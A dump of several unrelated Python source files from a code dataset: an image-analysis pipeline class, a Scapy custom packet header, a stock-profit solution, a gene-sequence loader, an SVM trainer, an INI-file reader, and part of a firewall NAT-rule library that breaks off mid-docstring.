_load_configs(self, input_config):\n self.data.config = Config(input_config, self.data.expected_configs)\n if not self.data.config.is_valid():\n self.logger.error(\n 'Missing required config items, you are missing: %s \\nYou provided:'\\\n '\\n%s\\n***Algo will early return***\\n\\n',\n self.data.config.missing_configs, input_config)\n return False\n\n self.logger.info(\"Equipment config items were successfully read.\\n\")\n self.logger.debug(\"The following equipment config items were provided and successfully\"\\\n \" read:\\n\\n%s\\n\\n\", input_config)\n return True\n\n\n def _load_image(self, input_image):\n self.data.load_image(input_image)\n if not self.data.is_valid_image:\n self.logger.error(\"Could not convert the provided input image from 
bytearray to\"\\\n                \" numpy array.\\n***Algo will early return***\\n\\n\")\n            return False\n\n        if self.data.debugMode:\n            self.data.debug_info.append({'description': 'Input image after conversion from '\n                'bytearray to numpy', 'image': visUtils.encodeImageAsBase64(self.data.input_image_np)})\n        return True\n\n\n    def _detect_boundaries(self):\n        validResult = self.boxDetector.inferOnSingleImage(self.data)\n\n        self.logger.debug(\"Result of boxDetector.inferOnSingleImage was: %s\\n Highest scoring\"\\\n            \" bucket bounding box was\\n %s \\nwith score of: %s\\n Highest scoring matInside bounding\"\\\n            \" box was\\n%s\\nwith score of: %s\\n Highest scoring case bounding box was\\n%s\\nwith\"\\\n            \" score of: %s\\n\\n\", validResult, self.data.bucketBoundary, self.data.bucketScore,\\\n            self.data.matInsideBoundary, self.data.matInsideScore, self.data.caseBoundary,\\\n            self.data.caseScore)\n        \n        return validResult\n    \n\n    def _find_pixel_conversion_factor(self):\n        boxDetectorPredictionValid = utils.getPixel2CmConversionFactor(self.data)\n\n        self.logger.debug(\"_find_pixel_conversion_factor detected the width of the bucket in pixels to be: %s\\n \"\\\n            \"pixel2CM_conversion_factor was found to be: %s\\nboxDetectorPredictionValid = %s\\nbucketWidthPointsXCord = %s\\n\\n\",\\\n            self.data.bucketWidthPX, self.data.pixel2CM_conversion_factor, boxDetectorPredictionValid, self.data.bucketWidthPointsXCord)\n\n        if not boxDetectorPredictionValid:\n            self.logger.warning(\"Detected bucket boundary NOT valid.\\n***Algo will early return***\\n\")\n            return False\n        return True\n\n\n    def _find_best_crop_boundary(self):\n        utils.getBestBoundaryToCropWith(self.data)\n\n        self.logger.debug(\"The best boundary to crop the image with was found to be\\n%s\\n\\n\",\\\n            self.data.bestBoundary)\n\n        if len(self.data.bestBoundary) != 4:\n            self.logger.warning(\"Was unable to find the best boundary to crop the image with\"\\\n                \" because NOT ALL of the objects required by config were detected.\\n***Algo will\"\\\n                \" early return***\\n\")\n            return False\n        return True\n\n\n    def _crop_input_image(self):\n        imageCropSuccess = utils.cropImage(self.data)\n\n        if (not imageCropSuccess) or len(self.data.input_image_np_cropped) == 0:\n            self.logger.warning(\"Could not find appropriate bounding boxes to crop the image with.\"\\\n                \"\\n***Algo will early return***\\n\")\n            return False\n\n        self.logger.info(\"Was able to successfully crop the image using detected bounding boxes.\\n\")\n        if self.data.debugMode:\n            self.data.debug_info.append({'description': 'Input image cropped using the best '\n                'detected boundary', 'image':\\\n                visUtils.encodeImageAsBase64(self.data.input_image_np_cropped)})\n        return imageCropSuccess\n\n\n    def _detect_roi_uncrop_image(self):\n        validRoi = self.roiDelineator.inferOnSingleImage(self.data)\n\n        imageUncropSuccess = utils.uncropImage(self.data)\n\n        if self.data.debugMode:\n            self.data.roi_roidDelineatorSize.dtype='uint8'\n            self.data.debug_info.append({'description': 'output of roiDelineator network in original'\\\n                ' (raw) size','image': visUtils.encodeImageAsBase64(cv2.cvtColor(\\\n                self.data.roi_roidDelineatorSize*255, cv2.COLOR_GRAY2BGR))})\n\n            self.data.roi_actualSize.dtype='uint8'\n            self.data.debug_info.append({'description': 'output of roiDelineator network resized '\\\n                'to the same scale as input image',\n                'image': visUtils.encodeImageAsBase64(cv2.cvtColor(\\\n                self.data.roi_actualSize*255, cv2.COLOR_GRAY2BGR))})\n        \n        return validRoi and imageUncropSuccess\n\n\n    def _calculate_roi_boundary(self):\n        \n        if not 
utils.postProcessRoi(self.data):\n            self.logger.warning(\"_calculate_roi_boundary returned early because of a failure in\"\\\n                \" utils.postProcessRoi\\n\")\n            return False\n        \n        \n        if not utils.getRoiContour(self.data):\n            self.logger.error(\"_calculate_roi_boundary returned early because of a failure in\"\\\n                \" utils.getRoiContour\\n\")\n            return False\n        \n        validBoundaryPoints = utils.getRoiBoundaryPoints(self.data)\n\n        if self.data.debugMode:\n            self.data.debug_info.append({'description': 'output of roiDelineator, output of '\n                'boxDetector, and the approximated roi boundary points all overlaid on the input image',\n                'image': visUtils.visualizeAllResults(\n                    self.data.input_image_np,\n                    self.data.roi_actualSize,\n                    self.data.bestBoundary,\n                    self.data.bucketScore,\n                    self.data.matInsideBoundary,\n                    self.data.matInsideScore,\n                    self.data.caseBoundary,\n                    self.data.caseScore,\n                    self.data.bucketLeftEdge,\n                    self.data.bucketRightEdge,\n                    self.data.bucketMidEdge,\n                    self.data.approximated_roi_boundary)})\n        \n        return validBoundaryPoints\n\n\n    def _validate_returned_dictionary_serializability(self):\n        try:\n            serializedOutput = json.dumps(self.data.as_dict(self.data.debugMode))\n        except:\n            self.logger.error(\"_validate_returned_dictionary_serializability thinks the\"\\\n                \" returned dictionary is NOT serializable. Just empty results will be returned.\")\n            return False\n\n        self.logger.debug(\"_validate_returned_dictionary_serializability verified that\"\\\n            \" returned dictionary is serializable.\")\n        return True\n\n\n    def _validate_results(self):\n        roiValid = utils.validateApproximatedRoiBoundary(self.data)\n\n        bucketBoxValid = utils.validateBucketBox(self.data)\n        matInsideBoxValid = utils.validateMatInsideBox(self.data)\n        bucketLinesValid = utils.validateBucketLines(self.data)\n\n        returnedDictionaryIsSerializable = self._validate_returned_dictionary_serializability()\n\n        \n        self.logger.debug(\"The approximated (reduced) roi boundary was valid = %s\\n\\n\", roiValid)\n\n        self.logger.debug(\"The bucketBox was valid = %s\\n\\n\", bucketBoxValid)\n\n        self.logger.debug(\"The matInsideBox was valid = %s\\n\\n\", matInsideBoxValid)\n\n        self.logger.debug(\"The bucketLines were valid = %s\\n\\n\", bucketLinesValid)\n\n        self.logger.debug(\"returnedDictionaryIsSerializable = %s\\n\\n\", returnedDictionaryIsSerializable)\n\n\n        if roiValid and bucketBoxValid and matInsideBoxValid and returnedDictionaryIsSerializable:\n            self.data.valid = True\n            self.logger.info(\"Successfully calculated and verified final results.\\n\")\n            return True\n\n        else:\n            self.data.clearOutputData()\n            
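# clear every output field so callers never see partially computed values\n            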
self.logger.info(\"Validation of final results failed. We are going to return empty values\"\\\n                \" instead of what we calculated because garbage values cause trouble downstream.\")\n            return False\n\n\n    def _run_algorithm(self, input_image, input_config):\n        # Clear all existing fields (containing previous execution results) except self.data.debugMode\n        self.data.initAllData()\n        \n        if not self._load_configs(input_config) or not self._load_image(input_image):\n            self.logger.error(\"_run_algorithm returned early because of bad input image or bad configs \\n\")\n            return False\n\n        if not self._detect_boundaries():\n            self.logger.warning(\"_run_algorithm returned early because of a failure in _detect_boundaries\\n\")\n            return False\n\n        if not self._find_best_crop_boundary():\n            self.logger.warning(\"_run_algorithm returned early because of a failure in _find_best_crop_boundary\\n\")\n            return False\n\n        if not self._find_pixel_conversion_factor():\n            self.logger.warning(\"_run_algorithm returned early because of a failure in _find_pixel_conversion_factor\\n\")\n            return False\n\n        if not self._crop_input_image():\n            self.logger.warning(\"_run_algorithm returned early because of a failure in _crop_input_image\\n\")\n            return False\n\n        if not self._detect_roi_uncrop_image():\n            self.logger.warning(\"_run_algorithm returned early because of a failure in _detect_roi_uncrop_image\\n\")\n            return False\n        \n        if not self._calculate_roi_boundary():\n            self.logger.warning(\"_run_algorithm returned early because of a failure in _calculate_roi_boundary\\n\")\n            return False\n\n        if not self._validate_results():\n            self.logger.warning(\"_run_algorithm returned early because of a failure in _validate_results\\n\")\n            return False\n\n        self.logger.info(\"_run_algorithm returned the following results (excluding the debug info):\\n%s\\n\\n\",\n            self.data.as_dict())\n\n        return True\n\n\n    def execute(self, input_image, input_config):\n        achievedFinalResults = self._run_algorithm(input_image, input_config)\n        self.logger.info(\"_run_algorithm achieved final results == %s.\\n\", achievedFinalResults)\n\n        if not achievedFinalResults:\n            self.data.clearOutputData()\n        \n        return self.data.as_dict(self.data.debugMode)","sub_path":"fmdl_algo/fmdlAlgo/FMDLAlgo.py","file_name":"FMDLAlgo.py","file_ext":"py","file_size_in_byte":17920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"286370539","text":"from scapy.all import *\nimport sys, os\n\nTYPE_CUSTOMDATA = 0x1313\nTYPE_IPV4 = 0x0800\n\nclass CustomData(Packet):\n    name = \"CustomData\"\n    fields_desc = [\n        # 16 bits\n        ShortField(\"proto_id\", 0),\n        ShortField(\"content_id\", 101),\n        # 8 bits\n        ByteField(\"ingress_num\", 0),\n        ByteField(\"egress_num\", 0),\n    ]\n    def mysummary(self):\n        return self.sprintf(\"proto_id=%proto_id%, content_id=%content_id%, ingress_num=%ingress_num%, egress_num=%egress_num%\")\n\n\nbind_layers(Ether, CustomData, type=TYPE_CUSTOMDATA)\nbind_layers(CustomData, IP, proto_id=TYPE_IPV4)\n","sub_path":"exercises/recirculate/customdata_header.py","file_name":"customdata_header.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"639977211","text":"class Solution(object):\n    def maxProfit(self, prices):\n        \"\"\"\n        :type prices: List[int]\n        :rtype: int\n        \"\"\"\n        minNow = 1 << 30  # effectively +infinity\n        maxProfit = 0\n        \n        for i in range(len(prices)):\n            price = prices[i]\n            if price - minNow > maxProfit:\n                maxProfit = price - minNow\n            if price < minNow:\n                minNow = price\n\n        return maxProfit\n\n\n
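# Single pass: track the cheapest price seen so far and the best profit from\n# selling at the current price -- O(n) time, O(1) extra space.\n# e.g. prices [7, 1, 5, 3, 6, 4]: buy at 1, sell at 6 -> profit 5.\n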
if __name__ == '__main__':\n    # l = [7, 1, 5, 3, 6, 4]\n    l = [7,6,4,3,1]\n    print(Solution().maxProfit(l))\n","sub_path":"121.py","file_name":"121.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"333803850","text":"##########################################################################\n### Importing required modules\n##########################################################################\n\nimport os\nimport pickle\nimport time\nimport importlib\n\n# to use these modules, TRAL has to be installed properly\nfrom tral.sequence import sequence\n\n##########################################################################\n### Defining paths and variables\n##########################################################################\n\nworking_directory = \"/home/lina/SynologyDrive/TRAL_Masterthesis/TRAL_Pipeline_Analytics/TRAL_Analytics/working_files\"\nsequences_path = \"/home/lina/SynologyDrive/TRAL_Masterthesis/IBM_files/Assembled_genes\"\n\n## tissues to analyze\ntissues = [\"blood_derived_normal\",\"primary_tumor\",\"solid_tissue_normal\"]\n\n## genes to analyze\n# genes_list = \"/home/lina/SynologyDrive/TRAL_Masterthesis/TRAL_Pipeline_Analytics/Prepare_PASS/colorectal_msi_genes.txt\"\n# with open(genes_list) as g:\n#     genes = g.readlines()\n# genes = [x.strip() for x in genes]\n# or define a list with only a few genes:\n\ngenes = [\"APC\",\"MLH1\"]\n# genes = [\"APC\"]\npatients = [ patient for patient in os.listdir(sequences_path)]\n# patients = [\"Pat1\",\"Pat10\",\"Pat34\"]\n\n##########################################################################\n### Get the sequences from files\n##########################################################################\n\n# sequences_per_gene = sequences_per_gene(genes, sequences_path,show_time=True,as_pickle=True)\n# sequences_per_gene[\"MLH1\"][\"primary_tumor\"][\"Pat29\"]\n# sequences_per_gene[\"APC\"][\"primary_tumor\"][\"Pat29\"]\n\n# pickle_sequences = retrieve_sequences_pickle(working_directory, genes)\n# pickle_sequences[\"APC\"][\"primary_tumor\"][\"Pat34\"]\n# pickle_sequences[\"MLH1\"][\"solid_tissue_normal\"][\"Pat28\"]\n\ndef retrieve_sequences_pickle(working_directory, genes):\n\n    \"\"\" returns a dictionary of sequences for each gene in the input list\n    sequences_per_gene[gene][tissue][patient] if saved as pickle in working_directory\n\n    Args:\n        genes (list): defines for which genes the sequences should be taken \"\"\"\n\n    sequences_per_gene = {}\n    for gene in genes:\n        with open(os.path.join(working_directory, \"sequences\", gene + \".pkl\"), 'rb') as handle:\n            sequences = pickle.load(handle) \n        sequences_per_gene.update({gene:sequences})\n    return sequences_per_gene\n\ndef sequences_per_gene(genes, sequences_path, show_time=False, as_pickle=False, patient=True):\n    \n    \"\"\" TODO: Update documentation here!!! 
(patient=True)\n    \n    returns a dictionary of sequences for each gene in the input list\n    sequences_per_gene[gene][tissue][patient]\n\n    Args:\n        genes (list): defines for which genes the sequences should be taken\n        sequences_path (string) \n        show_time: prints time if true\n        as_pickle: save sequences as pickle if true \"\"\"\n\n    start = time.time()\n    # create one dictionary per gene\n    sequences_per_gene = {}\n    for gene in genes:\n        # gene name gives dictionary of all patients for all tissues\n        if patient: # patient data\n            sequences = iterate_patients(sequences_path, gene)\n        else: # uniprot data\n            sequences = get_sequences(sequences_path, gene)\n        if as_pickle:\n            save_path = os.path.join(working_directory, \"sequences\", gene + \".pkl\")\n            try:\n                with open(save_path, \"wb\") as handle:\n                    pickle.dump(sequences, handle)\n            except (IOError, OSError) as e:\n                print(\"Was not able to create a pickle from the sequences.\\n Error:{}\".format(e))\n        sequences_per_gene.update({gene:sequences})\n    \n    end = time.time() \n    if show_time:\n        print(\"It took {} seconds to get the sequences.\".format(end - start))\n    \n    return(sequences_per_gene)\n\n\ndef iterate_patients(sequences_path, gene):\n\n    \"\"\" returns a dictionary of sequences for the gene in the input list\n    sequences[tissue][patient]\n\n    Args:\n        gene (string)\n        sequences_path (string) \"\"\"\n\n    # initialize dictionary for tissues\n    sequences = {tissue: {patient: None for patient in patients} for tissue in tissues}\n\n    for patient in patients:\n        for tissue in tissues:\n            tissue_path = os.path.join(sequences_path, patient, tissue)\n            try:\n                sequences[tissue][patient] = get_sequences(tissue_path, gene)\n                print(\"Got sequences from tissue {} and patient {}\".format(tissue, patient))\n            except:\n                print(\"Unexpected Error while trying to call get_sequences({}, {}).\".format(tissue_path, gene))\n                raise\n    \n    return sequences\n\n\ndef get_sequences(data_path, gene):\n\n    \"\"\" returns TRAL sequences from a fasta-file (named <gene>.fasta)\n\n    Args:\n        gene (string)\n        data_path (string) \"\"\"\n    \n    sequence_file = os.path.join(data_path, gene + \".fasta\")\n    try:\n        sequences_gene = sequence.Sequence.create(file = sequence_file, input_format = 'fasta')\n    except FileNotFoundError:\n        print(\"Did not find {} in {}.\".format(gene,data_path))\n        sequences_gene = \"Did not find {} in {}.\".format(gene,data_path)\n    except:\n        print(\"Unexpected Error while trying to get the sequence from {}.\".format(sequence_file))\n        sequences_gene = \"Unexpected Error while trying to get the sequence from {}.\".format(sequence_file)\n    # print(\"sequences_gene\", sequences_gene)\n    return sequences_gene","sub_path":"TRAL_Analytics/get_sequences.py","file_name":"get_sequences.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"477203920","text":"import logging\nimport pickle\n\nimport pandas\nfrom sklearn import svm\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.metrics import confusion_matrix, classification_report\n\n# NOTE: the frame-range constants (TRAIN_MIN, TRAIN_MAX, VAL_MIN, VAL_MAX,\n# TEST_MIN, TEST_MAX) are assumed to be defined elsewhere in the project.\n\n\ndef train(name, class_weight=None, c=1.0, data='data/model_data.csv', training_only=True, drop=[]):\n    data = pandas.read_csv(data)\n    #data = data.head(datapoints)\n\n    train = data.loc[((data.frameID >= TRAIN_MIN) & (data.frameID <= TRAIN_MAX))]\n    val = data.loc[((data.frameID >= VAL_MIN) & (data.frameID <= VAL_MAX))]\n    test = data.loc[((data.frameID >= TEST_MIN) & (data.frameID <= TEST_MAX))]\n\n    if training_only:\n        X_train = train.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n        y_train = train['group_label']\n\n        X_val = val.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n        y_val = val['group_label']\n\n        
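# the held-out test frames are never used for fitting, only for final reporting\n        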
X_test = test.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n        y_test = test['group_label']\n    else:\n        t = data.loc[((data.frameID >= TRAIN_MIN) & (data.frameID <= VAL_MAX))]\n        X_train = t.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n        y_train = t['group_label']\n\n        X_val = val.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n        y_val = val['group_label']\n\n        X_test = test.drop(columns=['frameID','pedID1','pedID2','group_label'] + drop)\n        y_test = test['group_label']\n    \n    logging.info(\"Starting to train SVM\")\n    m = svm.LinearSVC(class_weight=class_weight, C=c)\n    clf = CalibratedClassifierCV(m)\n    clf.fit(X_train, y_train)\n\n    logging.info(\"=======\" + name + \"=======\")\n    logging.info(\"Testing on val set\")\n    y_pred = clf.predict(X_val)\n    logging.info(confusion_matrix(y_val,y_pred))\n    logging.info(classification_report(y_val,y_pred))\n\n    logging.info(\"Testing on test set\")\n    y_pred = clf.predict(X_test)\n    logging.info(confusion_matrix(y_test,y_pred))\n    logging.info(classification_report(y_test,y_pred))\n\n    logging.info(\"writing to outfile\")\n    outfile = \"data/social_relations_\" +str(name)+ \".model\"\n    pickle.dump(clf, open(outfile, \"wb\"))\n    logging.info(\"finished\\n\")","sub_path":"detect_groups_simple.py","file_name":"detect_groups_simple.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"511492626","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n#\n# Scope: ............\n# by Loreto Notarantonio 2013, February\n# ######################################################################################\nimport sys\nimport os\n\nimport collections\nimport configparser\nimport codecs\n\nfrom ..LnCommon.LnLogger import SetLogger\nfrom ..LnCommon.LnColor import LnColor\n\n# ######################################################\n# # https://docs.python.org/3/library/configparser.html\n# ######################################################\ndef ReadIniFile(fileName, RAW=False, returnOrderedDict=False, extraSections=[], exitOnError=False, STRICT=True, subSectionChar=None):\n    logger = SetLogger(package=__name__)\n\n    # Parser setup\n    configMain = configparser.ConfigParser( allow_no_value=False,\n                        delimiters=('=', ':'),\n                        comment_prefixes=('#',';'),\n                        inline_comment_prefixes=(';',),\n                        strict=STRICT,  # True: enforces unique keys/sections\n                        # strict=False,\n                        empty_lines_in_values=True,\n                        default_section='DEFAULT',\n                        interpolation=configparser.ExtendedInterpolation()\n                        )\n    configMain.optionxform = str # keep the case of section and key names (make sure references to internal vars are case-sensitive)\n\n    try:\n        data = codecs.open(fileName, \"r\", \"utf8\")\n        configMain.readfp(data)\n\n    except (Exception) as why:\n        print(\"Error while reading the file: {FILE} - {WHY}\".format(FILE=fileName, WHY=str(why)))\n        sys.exit(-1)\n\n\n\n    # ------------------------------------------------------------------\n    # - merge every section listed as extra into the parsed config.\n    # - If key/value pairs already exist they are replaced\n    # ------------------------------------------------------------------\n    for sectionName in extraSections:\n        logger.info('adding Section: {SECTION}'.format(SECTION=sectionName))\n        logger.info('          data: {EXTRA}'.format(EXTRA=extraSections[sectionName]))\n        extraSection = extraSections[sectionName]\n\n        if not configMain.has_section(sectionName):\n            logger.debug('creating Section: {0}'.format(sectionName))\n            
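# register the missing section first so its key/value pairs can be merged below\n            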
configMain.add_section(sectionName)\n\n        for key, val in extraSection.items():\n            logger.debug('adding on Section {0}:'.format(sectionName))\n            logger.debug('       key: {0}'.format(key))\n            logger.debug('       val: {0}'.format(val))\n            configMain.set(sectionName, key, val)\n\n\n\n\n\n\n    # Parse the file\n    if type(configMain) in [configparser.ConfigParser]:\n        configDict = iniConfigAsDict(configMain, returnOrderedDict=returnOrderedDict, raw=RAW, subSectionChar=subSectionChar)\n    else:\n        configDict = configMain\n\n    return configMain, configDict\n\n\n############################################################\n# subSectionChar: character to look for in the section name so that the\n# section is interpreted as section+subsection\n############################################################\ndef iniConfigAsDict(INIConfig, sectionName=None, returnOrderedDict=False, raw=False, subSectionChar=None):\n    \"\"\"\n    Converts a ConfigParser object into a dictionary.\n\n    The resulting dictionary has sections as keys which point to a dict of the\n    section's options as key => value pairs.\n    \"\"\"\n\n    the_dict = collections.OrderedDict({}) if returnOrderedDict else {}\n    fDEBUG = False\n    try:\n        for section in INIConfig.sections():\n            # -----------------------------------------------------------------------\n            # - this block splits any section whose name contains the\n            # - separator character and interprets the parts as subSections\n            # -----------------------------------------------------------------------\n            if subSectionChar:\n                subSection = section.split(subSectionChar)\n            else:\n                subSection = [section] # a single section\n\n            # if len(subSection) > 1:\n            #     print (subSection)\n            currSECT = the_dict # top\n            for sect in subSection:\n                # print (sect)\n                if not sect in currSECT:\n                    currSECT[sect] = collections.OrderedDict({}) if returnOrderedDict else {}\n                currSECT = currSECT[sect] # update the pointer\n\n\n            # else: # work with only one level of sections.\n            #     the_dict[section] = collections.OrderedDict({}) if returnOrderedDict else {}\n            #     currSECT = the_dict[section]\n\n            if fDEBUG: print ()\n            if fDEBUG: print ('[{SECT}]'.format(SECT=section))\n            for key, val in INIConfig.items(section, raw=raw):\n                currSECT[key] = val\n                if fDEBUG: print ('    {KEY:<30} : {VAL}'.format(KEY=key, VAL=val))\n\n    except (configparser.InterpolationMissingOptionError) as why:\n        print(\"\\n\"*2)\n        
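# a ${section:option} interpolation could not be resolved; print a visible error banner\n        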
print(\"=\"*60)\n print(\"ERRORE nella validazione del file\")\n print(\"-\"*60)\n print(str(why))\n print(\"=\"*60)\n sys.exit(-2)\n\n if sectionName:\n return the_dict[sectionName]\n else:\n return the_dict\n\n\n\n\n############################################################\n#\n############################################################\ndef printINIconfigparser(INI_raw):\n for section in INI_raw.sections():\n print ()\n print ('[{SECTION}]'.format(SECTION=section))\n for key, val in INI_raw.items(section):\n TAB = 37*' '\n print (' {KEY:<30} : {VAL}'.format(KEY=key, VAL=val.replace ('\\n', '\\n' + TAB)))\n\n\n\n############################################################\n#\n############################################################\ndef printINIdict(INI_dict):\n for sectName in INI_dict.keys():\n print ()\n print ('[{SECTION}]'.format(SECTION=sectName))\n # for key, val in INI_dict[sectName].items(sectName):\n TAB = 37*' '\n for key, val in INI_dict[sectName].items():\n print (' {KEY:<30} : {VAL}'.format(KEY=key, VAL=val.replace ('\\n', '\\n' + TAB)))\n\n\nif __name__ == '__main__':\n print ('sono qui')\n iniFile = 'ReadIniFile.test.ini'\n with open(iniFile, \"r\") as f:\n data = f.read()\n print (data)\n\n Raw, Dict = readIniFile(iniFile, RAW=True, returnOrderedDict=True, exitOnError=True, STRICT=False)\n # printINIconfigparser (Raw)\n printINIdict (Dict)\n sys.exit()\n","sub_path":"File/appo/ReadIniFile.py","file_name":"ReadIniFile.py","file_ext":"py","file_size_in_byte":8146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"639321151","text":"def _reverse(c): \n od = ord(c)\n if(65<=od and od<=90):\n od = 90 - (od-65)\n return chr(od)\n elif(97<=od and od<=122):\n od = 122 - (od - 97)\n return chr(od)\n else:\n return c\n#print(_reverse('a'))\nwhile True:\n temp = \"\"\n inp = input()\n if(inp == \"!\"):\n break\n else:\n for i in inp:\n temp = temp + _reverse(i)\n print(temp)","sub_path":"Code/CodeRecords/2977/52592/319706.py","file_name":"319706.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"49964457","text":"from smc.policy.rule import Rule, RuleCommon\nfrom smc.base.model import Element, SubElement, SubElementCreator\nfrom smc.policy.rule_elements import LogOptions, Destination\nfrom smc.api.exceptions import ElementNotFound, InvalidRuleValue,\\\n CreateRuleFailed\nfrom smc.base.util import element_resolver\nfrom smc.base.structs import NestedDict\n\n\nclass NATRule(Rule):\n @property\n def used_on(self):\n \"\"\"\n Used on specific whether this NAT rule has a specific engine that\n this rule applies to. 
Default is ANY (unspecified).\n\n        :param str,Element value: :py:class:`smc.elements.network` element to\n            apply to this NAT rule, or str href\n        :return: Element value: name of element this NAT rule is applied on\n        \"\"\"\n        if 'used_on' in self.data:\n            return Element.from_href(self.data.get('used_on'))\n\n    @used_on.setter\n    def used_on(self, value):\n        try:\n            self.data['used_on'] = element_resolver(value)\n        except ElementNotFound:\n            pass\n\n    @property\n    def action(self):\n        pass\n\n    @property\n    def authentication_options(self):\n        pass\n\n    @property\n    def dynamic_src_nat(self):\n        \"\"\"\n        Dynamic Source NAT configuration for this NAT rule.\n\n        :return: :py:class:`~DynamicSourceNAT`: dynamic source nat object\n        \"\"\"\n        return DynamicSourceNAT(self)\n\n    @property\n    def static_src_nat(self):\n        \"\"\"\n        Static Source NAT configuration for this NAT rule.\n\n        :return: :py:class:`~StaticSourceNAT`: static source nat object\n        \"\"\"\n        return StaticSourceNAT(self)\n\n    @property\n    def static_dst_nat(self):\n        \"\"\"\n        Static Destination NAT configuration for this NAT rule\n\n        :return: :py:class:`~StaticDestNAT`: static dest nat object\n        \"\"\"\n        return StaticDestNAT(self)\n\n\nclass NATElement(NestedDict):\n    \"\"\"\n    Common structure for source and destination NAT\n    configurations.\n    \"\"\"\n    def __init__(self, rule):\n        options = rule.data.get('options')\n        super(NATElement, self).__init__(data=options)\n    \n    @property\n    def has_nat(self):\n        \"\"\"\n        Is NAT already enabled (assuming modification) or newly\n        created.\n\n        :return: boolean\n        \"\"\"\n        return self.typeof in self\n    \n    @property\n    def automatic_proxy(self):\n        \"\"\"\n        Is proxy arp enabled. Leaving this in the on state is recommended.\n\n        :param bool value: enable/disable proxy arp\n        :rtype: bool\n        \"\"\"\n        return self.get(self.typeof, {}).get(\n            'automatic_proxy')\n\n    @automatic_proxy.setter\n    def automatic_proxy(self, value):\n        self.setdefault(self.typeof, {}).update(\n            automatic_proxy=value)\n    \n    @property\n    def original_value(self):\n        \"\"\"\n        Original value is the element's location. Setting this can\n        be done by providing an element from :py:class:`smc.elements.network`\n        or the direct href. For source NAT, this will be the NAT source element,\n        and for dynamic dst NAT, this will be the destination element.\n\n        :param str value: element or href from source or destination field\n        :return: str original_value: element location \n        \"\"\"\n        values = self.get(self.typeof, {}).get('original_value')\n        if values:\n            if 'ip_descriptor' in values:\n                return values['ip_descriptor']\n            elif 'element' in values:\n                return values['element']\n    \n    @original_value.setter\n    def original_value(self, value):\n        src = element_resolver(value, do_raise=False)\n        if src and src.startswith('http'):\n            self.setdefault(self.typeof, {'original_value': {}}).update(\n                original_value={'element':src})\n    \n    @property\n    def translated_value(self):\n        \"\"\"\n        Translated value is the NAT value based on the type of\n        NAT. 
For source NAT and destination NAT this can be either\n        an IP address or an element from :py:class:`smc.elements.network`.\n\n        :param str value: string ip address or Element (or element href)\n        :return: str value: translated value, giving preference to the IP address\n            if both an ip address and an element are defined.\n        \"\"\"\n        values = self.get(self.typeof, {}).get(\n            'translated_value', {})\n        if values:\n            if 'ip_descriptor' in values:\n                return values['ip_descriptor']\n            elif 'element' in values:\n                return values['element']\n\n    @translated_value.setter\n    def translated_value(self, value):\n        try:\n            src = {'element': value.href}\n        except AttributeError:\n            src = {'ip_descriptor': value}\n        \n        p = self.setdefault(self.typeof, {})\n        p.setdefault('translated_value', {}).update(src)\n    \n\nclass DynamicSourceNAT(NATElement):\n    typeof = 'dynamic_src_nat'\n    \n    @property\n    def original_value(self):\n        pass\n    \n    @property\n    def translated_value(self):\n        \"\"\"\n        The translated value for source NAT is the IP address (or element)\n        which will be the translated address for the source. Typically referred\n        to as the outbound NAT address.\n\n        When setting a new translated address, input should be a string type\n        specifying either the IP address to translate to, or can be a valid\n        network element from :py:class:`smc.elements.network`. If translated\n        ports are not specified, source NAT will use the original ports defined,\n        or, if this is a new object, a dynamic port range of 1024-65535. \n\n        :param str value: ipaddress or :py:class:`smc.elements.network` object\n        :return: str translated address or name\n        \"\"\"\n        for value in self.get(self.typeof, {}).get(\n                'translation_values', []):\n            if 'ip_descriptor' in value:\n                return value['ip_descriptor']\n            elif 'element' in value:\n                return value['element']\n        \n    @translated_value.setter\n    def translated_value(self, value):\n        try:\n            src = {'element': value.href}\n        except AttributeError:\n            src = {'ip_descriptor': value}\n        \n        values = self.setdefault(self.typeof, {'translation_values': []})\n        if values.get('translation_values'):\n            values['translation_values'][0].update(src)\n        else:\n            values['translation_values'].append(src)\n    \n    @property\n    def translated_ports(self):\n        \"\"\"\n        Translated ports allows custom configuration for PAT on the \n        source NAT configuration.\n\n        :param tuple min_port,max_port: starting and ending port for source NAT (PAT)\n        :return tuple value: min and max ports defined\n        \"\"\"\n        values = self.get(self.typeof, {}).get(\n            'translation_values', [])\n        if values and 'min_port' in values[0]:\n            return (values[0].get('min_port'),\n                    values[0].get('max_port'))\n    \n    @translated_ports.setter\n    def translated_ports(self, value):\n        if not isinstance(value, tuple) or len(value) != 2:\n            raise ValueError(\"Input must be tuple and length 2\")\n        min_port, max_port = value\n        ports = {'min_port': min_port,\n                 'max_port': max_port}\n        \n        values = self.setdefault(self.typeof, {'translation_values': []})\n        if values.get('translation_values'):\n            values['translation_values'][0].update(ports)\n        else:\n            values['translation_values'].append(ports)\n\n\nclass StaticSourceNAT(NATElement):\n    \"\"\"\n    Source NAT defines the available options for configuration. 
